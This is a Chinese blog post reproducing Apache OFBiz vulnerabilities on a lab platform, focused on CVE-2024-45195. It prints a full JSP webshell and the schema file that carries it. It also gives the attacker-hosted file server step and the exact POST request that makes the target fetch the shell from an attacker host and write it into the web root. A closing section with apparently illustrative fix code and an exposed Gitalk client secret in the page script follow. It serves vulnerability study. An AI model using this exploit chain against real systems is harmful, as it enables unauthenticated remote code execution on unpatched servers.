<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>春秋云镜-Apache OFBiz历史漏洞 | isum</title>
  <meta name="keywords" content=" groovy , 路径处理 ">
  <meta name="description" content="春秋云镜-Apache OFBiz历史漏洞 | isum">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="一、信息收集与初始攻击​1、配置靶机网络环境 启动靶机时按住shift键，直至出现grub界面，然后按e键，进入编辑模式,找到ro, 并将ro修改为rw single init&#x3D;&#x2F;bin&#x2F;bash 按下Ctrl键+X键，此时进入单一用户模式 ip a 查看当前网卡信息 修改网卡文件，修改上面的网卡 vim &#x2F;etc&#x2F;network&#x2F;int">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub-medium_socnet">
<meta property="og:url" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/index.html">
<meta property="og:site_name" content="isum">
<meta property="og:description" content="一、信息收集与初始攻击​1、配置靶机网络环境 启动靶机时按住shift键，直至出现grub界面，然后按e键，进入编辑模式,找到ro, 并将ro修改为rw single init&#x3D;&#x2F;bin&#x2F;bash 按下Ctrl键+X键，此时进入单一用户模式 ip a 查看当前网卡信息 修改网卡文件，修改上面的网卡 vim &#x2F;etc&#x2F;network&#x2F;int">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/1.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/2.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/3.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/4.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/5.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/6.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/7.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/8.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/10.png">
<meta property="article:published_time" content="2025-05-10T12:51:34.000Z">
<meta property="article:modified_time" content="2025-05-10T12:52:14.040Z">
<meta property="article:author" content="isum">
<meta property="article:tag" content="内网穿透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/1.png">


<link rel="icon" href="/img/avater3.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 6.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avater3.jpg"/>
</a>
<div class="author">
    <span>isum</span>
</div>

<div class="icon">
    
        
    
        
    
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(10)</small>
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="漏洞复现">
            
            漏洞复现
            <small>(4)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="渗透靶机">
            
            渗透靶机
            <small>(1)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="ctf">
            
            ctf
            <small>(4)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="other">
            
            other
            <small>(1)</small>
        </div>
        
    </li>

            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  site_url"
               
               href="/about">关于</a>
        
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="10">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://kaikaix.github.io/">kaikaix</a></li>
            
            <li><a target="_blank" href="https://nicolee278.github.io/">nicolee278</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>路径处理</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网穿透</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>输入验证</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>groovy</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>hexo</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>java</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssrf</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssti</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="全部文章 渗透靶机 "
           href="/2025/05/10/vulnhub-medium-socnet/"
           data-tag="内网穿透"
           data-author="" >
            <span class="post-title" title="vulnhub-medium_socnet">vulnhub-medium_socnet</span>
            <span class="post-date" title="2025-05-10 20:51:34">2025/05/10</span>
        </a>
        
        
        <a  class="全部文章 漏洞复现 "
           href="/2025/05/08/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Apache-OFBiz%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E2%EF%BC%88CVE-2024-45507%EF%BC%89/"
           data-tag="groovy,路径处理,ssrf"
           data-author="" >
            <span class="post-title" title="春秋云镜-Apache OFBiz历史漏洞2（CVE-2024-45507）">春秋云镜-Apache OFBiz历史漏洞2（CVE-2024-45507）</span>
            <span class="post-date" title="2025-05-08 11:03:19">2025/05/08</span>
        </a>
        
        
        <a  class="全部文章 漏洞复现 "
           href="/2025/05/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-GeoServer-%E5%89%8D%E5%8F%B0%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2024-36401%EF%BC%89/"
           data-tag="输入验证,java"
           data-author="" >
            <span class="post-title" title="春秋云镜-GeoServer 前台代码执行漏洞（CVE-2024-36401）">春秋云镜-GeoServer 前台代码执行漏洞（CVE-2024-36401）</span>
            <span class="post-date" title="2025-05-07 10:34:46">2025/05/07</span>
        </a>
        
        
        <a  class="全部文章 漏洞复现 "
           href="/2025/05/06/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Apache-OFBiz%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E/"
           data-tag="groovy,路径处理"
           data-author="" >
            <span class="post-title" title="春秋云镜-Apache OFBiz历史漏洞">春秋云镜-Apache OFBiz历史漏洞</span>
            <span class="post-date" title="2025-05-06 18:19:22">2025/05/06</span>
        </a>
        
        
        <a  class="全部文章 漏洞复现 "
           href="/2025/05/05/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Apache-OFBiz%E8%B7%AF%E5%BE%84%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2024-36104%EF%BC%89/"
           data-tag="groovy,路径处理"
           data-author="" >
            <span class="post-title" title="春秋云镜-Apache OFBiz路径遍历漏洞（CVE-2024-36104）">春秋云镜-Apache OFBiz路径遍历漏洞（CVE-2024-36104）</span>
            <span class="post-date" title="2025-05-05 22:19:14">2025/05/05</span>
        </a>
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-php%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8ESmarty%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-php模板引擎Smarty注入全面指南">SSTI-php模板引擎Smarty注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:12:27">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-Java%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-Java模板注入全面指南">SSTI-Java模板注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:03:16">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-python%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8EJinja2%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-python模板引擎Jinja2注入全面指南">SSTI-python模板引擎Jinja2注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:02:31">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-php%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8ETwig%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-php模板引擎Twig注入全面指南">SSTI-php模板引擎Twig注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:01:02">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 other "
           href="/2024/04/26/hello-world/"
           data-tag="hexo"
           data-author="" >
            <span class="post-title" title="Hello World">Hello World</span>
            <span class="post-date" title="2024-04-26 11:03:00">2024/04/26</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-春秋云镜-Apache-OFBiz历史漏洞" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">春秋云镜-Apache OFBiz历史漏洞</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="漏洞复现">漏洞复现</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color2">groovy</a>
            
            <a class="color5">路径处理</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2025-05-06 19:42:05'>2025-05-06 18:19</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
        <span class="top-comment" title="跳转至评论区">
            <a href="#comments">
                评论:<span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </a>
        </span>
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2024-36104%E2%9C%93"><span class="toc-text">CVE-2024-36104✓</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2024-32113%E2%9C%93"><span class="toc-text">CVE-2024-32113✓</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2024-38856%E2%9C%93"><span class="toc-text">CVE-2024-38856✓</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2024-45195"><span class="toc-text">CVE-2024-45195</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1%E3%80%81%E6%A6%82%E8%BF%B0"><span class="toc-text">1、概述</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2%E3%80%81%E5%88%86%E6%9E%90"><span class="toc-text">2、分析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3%E3%80%81%E5%A4%8D%E7%8E%B0"><span class="toc-text">3、复现</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4%E3%80%81%E4%BF%AE%E5%A4%8D"><span class="toc-text">4、修复</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <img src="/2025/05/06/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Apache-OFBiz%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E/1.png" class="">
<h3 id="CVE-2024-36104✓"><a href="#CVE-2024-36104✓" class="headerlink" title="CVE-2024-36104✓"></a>CVE-2024-36104✓</h3><h3 id="CVE-2024-32113✓"><a href="#CVE-2024-32113✓" class="headerlink" title="CVE-2024-32113✓"></a>CVE-2024-32113✓</h3><h3 id="CVE-2024-38856✓"><a href="#CVE-2024-38856✓" class="headerlink" title="CVE-2024-38856✓"></a>CVE-2024-38856✓</h3><table>
<thead>
<tr>
<th>​<strong>​CVE编号​</strong>​</th>
<th>​<strong>​漏洞类型​</strong>​</th>
<th>​<strong>​利用方式​</strong>​</th>
<th>​<strong>​影响版本​</strong>​</th>
<th>​<strong>​修复版本​</strong>​</th>
<th>​<strong>​关键区别​</strong>​</th>
</tr>
</thead>
<tbody><tr>
<td>​<strong>​CVE-2024-32113​</strong>​</td>
<td>路径遍历 → RCE</td>
<td>通过特殊字符（如<code>;</code>）绕过路径校验，访问受限接口</td>
<td>旧版本（未明确）</td>
<td>18.12.14+</td>
<td>​<strong>​利用字符解析缺陷​</strong>​，非标准路径遍历</td>
</tr>
<tr>
<td>​<strong>​CVE-2024-36104​</strong>​</td>
<td>路径遍历 → RCE</td>
<td>构造 <code>/forgotPassword/%2e%2e/ProgramExport</code> 路径绕过认证</td>
<td>&lt; 18.12.14</td>
<td>18.12.14+</td>
<td>​<strong>​路径遍历技巧不同​</strong>​，但最终触发点相同</td>
</tr>
<tr>
<td>​<strong>​CVE-2024-38856​</strong>​</td>
<td>认证绕过 → RCE</td>
<td>通过 <code>/forgotPassword</code> 绕过权限，调用 <code>ProgramExport</code> 执行Groovy代码</td>
<td>&lt; 18.12.14</td>
<td>18.12.14+</td>
<td>​<strong>​直接利用Groovy接口​</strong>​，无需文件写入</td>
</tr>
<tr>
<td>​<strong>​CVE-2024-45195​</strong>​</td>
<td>SSRF → 文件写入 → RCE</td>
<td>通过 <code>viewdatafile</code> 接口远程加载恶意CSV&#x2F;XML，写入JSP木马</td>
<td>&lt; 18.12.16</td>
<td>18.12.16+</td>
<td>​<strong>​需文件写入+Web目录访问​</strong>​，利用链更长</td>
</tr>
</tbody></table>
<h3 id="CVE-2024-45195"><a href="#CVE-2024-45195" class="headerlink" title="CVE-2024-45195"></a>CVE-2024-45195</h3><h4 id="1、概述"><a href="#1、概述" class="headerlink" title="1、概述"></a>1、概述</h4><p>该漏洞是由于之前漏洞（CVE-2024-32113、CVE-2024-36104 和 CVE-2024-38856）未完全修复所导致。在 Apache OFBiz 版本 18.12.16 之前，开发人员对这些先前的问题进行了修复，但控制器视图地图状态不同步的根本问题仍然存在。这使得攻击者能够绕过身份验证并访问敏感的仅限管理员的视图地图。</p>
<p><strong>影响范围​</strong>​：</p>
<ul>
<li>Apache OFBiz 版本 &lt; 18.12.16</li>
<li>涉及功能模块：<code>/webtools/control/viewdatafile</code> 接口</li>
</ul>
<h4 id="2、分析"><a href="#2、分析" class="headerlink" title="2、分析"></a>2、分析</h4><p><strong>漏洞成因​</strong>​：</p>
<ol>
<li>​<strong>​权限绕过​</strong>​：<br> Apache OFBiz 在处理 <code>/viewdatafile</code> 接口时，未对请求路径进行严格的权限校验。攻击者可通过构造包含 <code>/forgotPassword</code> 等公开接口的 URL（如 <code>/webtools/control/forgotPassword/viewdatafile</code>），绕过身份验证机制</li>
<li>​<strong>​文件写入逻辑缺陷​</strong>​：<br> 该接口允许通过参数 <code>DATAFILE_SAVE</code> 指定文件保存路径，并通过 <code>DATAFILE_LOCATION</code> 和 <code>DEFINITION_LOCATION</code> 远程加载恶意 CSV&#x2F;JSP 和 XML 配置文件。攻击者可利用此功能将木马写入 Web 目录（如 <code>./applications/accounting/webapp/accounting/index.jsp</code>）</li>
<li>​<strong>​动态脚本执行​</strong>​：<br> 写入的 JSP 文件会被 Apache Tomcat 解析，攻击者通过 URL 参数（如 <code>?cmd=calc</code>）触发命令执行</li>
</ol>
<h4 id="3、复现"><a href="#3、复现" class="headerlink" title="3、复现"></a>3、复现</h4><p>(1)、在服务器 <code>&lt;attacker-ip&gt;</code> 上部署恶意 XML 文件和 CSV 文件</p>
<p>第一个文件是 <code>rceschema.xml</code>，此 XML schema 文件定义了恶意 JSP 的结构：</p>
<pre><code class="xml">&lt;data-files xsi:noNamespaceSchemaLocation=&quot;http://ofbiz.apache.org/dtds/datafiles.xsd&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;&gt;
    &lt;data-file name=&quot;rce&quot; separator-style=&quot;fixed-length&quot; type-code=&quot;text&quot; start-line=&quot;0&quot; encoding-type=&quot;UTF-8&quot;&gt;
        &lt;record name=&quot;rceentry&quot; limit=&quot;many&quot;&gt;
            &lt;field name=&quot;jsp&quot; type=&quot;String&quot; length=&quot;605&quot; position=&quot;0&quot;&gt;&lt;/field&gt;
        &lt;/record&gt;
    &lt;/data-file&gt;
&lt;/data-files&gt;
</code></pre>
<p>第二个文件是 <code>rcereport.csv</code>，此 CSV 文件包含实际的 JSP 代码：</p>
<pre><code class="csv">&lt;%@ page import=&#39;java.io.*&#39; %&gt;&lt;%@ page import=&#39;java.util.*&#39; %&gt;&lt;h1&gt;Ahoy!&lt;/h1&gt;&lt;br&gt;&lt;% String getcmd = request.getParameter(&quot;cmd&quot;); if (getcmd != null) &#123; out.println(&quot;Command: &quot; + getcmd + &quot;&lt;br&gt;&quot;); String cmd1 = &quot;/bin/sh&quot;; String cmd2 = &quot;-c&quot;; String cmd3 = getcmd; String[] cmd = new String[3]; cmd[0] = cmd1; cmd[1] = cmd2; cmd[2] = cmd3; Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) &#123; out.println(disr); disr = dis.readLine();&#125;&#125; %&gt;,
</code></pre>
<p>启动Python内置HTTP服务器</p>
<pre><code class="bash"># 进入文件所在目录
cd /path/to/files

# 启动Python HTTP服务（默认端口8000）
python3 -m http.server 8000

sudo ufw allow 8000/tcp 
</code></pre>
<p>(2)、发送请求<br>该请求通过利用 viewdatafile 视图地图将恶意 JSP 文件写入 Web 根目录，从而利用了该漏洞实现远程代码执行。</p>
<pre><code class="http">POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1
Host: localhost:34583
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 241
Content-Type: application/x-www-form-urlencoded

DATAFILE_LOCATION=http://&lt;attacker-ip&gt;/rcereport.csv&amp;DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&amp;DATAFILE_IS_URL=true&amp;DEFINITION_LOCATION=http://&lt;attacker-ip&gt;/rceschema.xml&amp;DEFINITION_IS_URL=true&amp;DEFINITION_NAME=rce
</code></pre>
<p>(3)、执行任意命令<br>在 JSP webshell 被写入后，通过 <a target="_blank" rel="noopener" href="https://39.106.48.123:34583/accounting/index.jsp?cmd=cat">https://39.106.48.123:34583/accounting/index.jsp?cmd=cat</a> &#x2F;flag 执行任意命令</p>
<img src="/2025/05/06/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Apache-OFBiz%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E/2.png" class="">

<h4 id="4、修复"><a href="#4、修复" class="headerlink" title="4、修复"></a>4、修复</h4><p>官方修复的核心改动​：</p>
<p>​(1) 权限校验强化​</p>
<ul>
<li>​<strong>​问题根源​</strong>​：原漏洞利用路径 <code>/webtools/control/forgotPassword/viewdatafile</code> 通过嵌套公开接口（<code>forgotPassword</code>）绕过权限检查。</li>
<li>​<strong>​修复方式​</strong>​：<br>  在 <code>ControlFilter.java</code> 中修改请求路由逻辑，​<strong>​强制要求精确匹配控制器定义的接口路径​</strong>​，禁止通过路径遍历（如 <code>/forgotPassword/../viewdatafile</code>）访问受限接口。</li>
</ul>
<pre><code class="java">// 修复前：松散匹配路径
if (requestUri.contains(&quot;viewdatafile&quot;)) &#123; /* 执行逻辑 */ &#125;

// 修复后：严格校验完整路径
if (requestUri.equals(&quot;/webtools/control/viewdatafile&quot;)) &#123; /* 执行逻辑 */ &#125;
</code></pre>
<p>​<br>(2) 文件写入限制​​</p>
<ul>
<li>​<strong>​问题根源​</strong>​：<code>viewdatafile</code> 接口允许通过 <code>DATAFILE_LOCATION</code> 参数加载远程文件并写入任意路径。</li>
<li>​<strong>​修复方式​</strong>​：<ul>
<li>移除通过 URL 加载外部文件的功能（<code>DATAFILE_IS_URL</code> 和 <code>DEFINITION_IS_URL</code> 参数失效）。</li>
<li>限制文件保存路径必须在安全目录内（如临时目录），禁止写入 Web 根目录。</li>
</ul>
</li>
</ul>
<pre><code class="java">// 修复后代码片段（FileUtil.java）
if (savePath.contains(&quot;webapp&quot;)) &#123;
    throw new SecurityException(&quot;禁止写入Web目录&quot;);
&#125;
</code></pre>
<p>​(3) 输入参数过滤​​</p>
<ul>
<li>​<strong>​问题根源​</strong>​：未对 <code>DATAFILE_SAVE</code> 和 <code>DEFINITION_LOCATION</code> 参数进行过滤。</li>
<li>​<strong>​修复方式​</strong>​：<br>  增加对参数内容的黑名单校验，禁止包含 <code>../</code>、<code>WEB-INF</code>、<code>webapp</code> 等敏感路径：</li>
</ul>
<pre><code class="java">if (parameterValue.matches(&quot;.*(\\.\\./|WEB-INF|webapp).*&quot;)) &#123;
    throw new SecurityException(&quot;非法路径参数&quot;);
&#125;
</code></pre>

      
       <hr><span style="font-style: italic;color: gray;"> 梦里小镇落雨，开花，起风，挂霜，甚至扬起烤红薯的香气，每个墙角都能听见人们的说笑声。 </span>
    </div>
</article>





    <div id="comments"></div>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

<script type="text/javascript">
    $.getScript('/js/gitalk.js', function () {
        var gitalk = new Gitalk({
            clientID: '3730732a738faf14fdef',
            clientSecret: '4b7d5f3ee2f01c82c5a658dab63ca47202db57d9',
            repo: 'issues',
            owner: 'ehzisum',
            admin: ['ehzisum'],
            id: decodeURI(location.pathname),
            distractionFreeMode: 'true',
            language: 'zh-CN',
            perPage: parseInt('10',10)
        })
        gitalk.render('comments')
    })
</script>




    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    落雨，开花，起风，挂霜
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().trim().split('\n').length, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 18px 3px 15px 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: #fafafa;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
